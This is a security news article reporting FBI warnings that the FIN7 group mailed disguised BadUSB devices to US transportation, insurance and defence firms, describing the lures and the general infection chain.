FIN7 hackers sent BadUSB devices to American companies

The FBI reports that in recent months, the FIN7 hack group has been sending BadUSB devices to American companies in the hopes of infecting their systems and providing a starting point for attacks.

FIN7 is known, among other things, for its Darkside and BlackMatter ransomware.

Since August 2021, the FBI has received reports of several packages containing such USB devices that have been sent to US transportation, insurance and defence companies. The parcels were sent using the United States Postal Service (USPS) and United Parcel Service (UPS).the FBI said.

There are two options for such packages: some mimic messages from HHS (US Department of Health and Human Services), so they are often accompanied by letters with links to recommendations for protection against COVID-19, indicating to refer to the attached USB stick. Others mimic an Amazon package that came in a gift box and contain a fake thank you letter, a fake gift card, and a USB device. Both shipments are known to contain LilyGO branded USB devices.

According to law enforcement officials, if the victim connected such a device to their PC, the device performs a BadUSB attack, during which the device uses the HID, registers itself as a keyboard, and transmits a series of predefined keystrokes to the user’s machine.

These keystrokes launched PowerShell commands that already downloaded and installed various malware that acted as backdoors. In the cases investigated by the FBI, the hack group gained administrative access and then attacked other local systems.

FIN7 contributors used a variety of tools including Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, TIRION, and deployed ransomware including BlackMatter and REvil on a compromised network.
Let me remind you that this is not the first such case. For example, in 2020, experts from Trustwave reported that an unnamed American hospitality company received a fake BestBuy gift card in the mail along with a malicious USB flash drive. The accompanying letter said that the drive needs to be connected to a computer in order to access a list of items for which a gift card can be used.

Let me remind you that we talked about the fact that main Fin7 activity is stealing companies’ financial archives (including debit cards), and gaining access to financial data and computers of employees of financial departments in order to steal funds, and also that when Hackers from all over the world attack Microsoft SharePoint servers: noticed traces of famous FIN7.

User Review
0 (0 votes)
Comments Rating 0 (0 reviews)

Daniel Zimmermann

Daniel Zimmermann has been writing on security and malware subjects for many years and has been working in the security industry for over 10 years. Daniel was educated at the Saarland University in Saarbrücken, Germany and currently lives in New York.

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *


This site uses Akismet to reduce spam. Learn how your comment data is processed.

Back to top button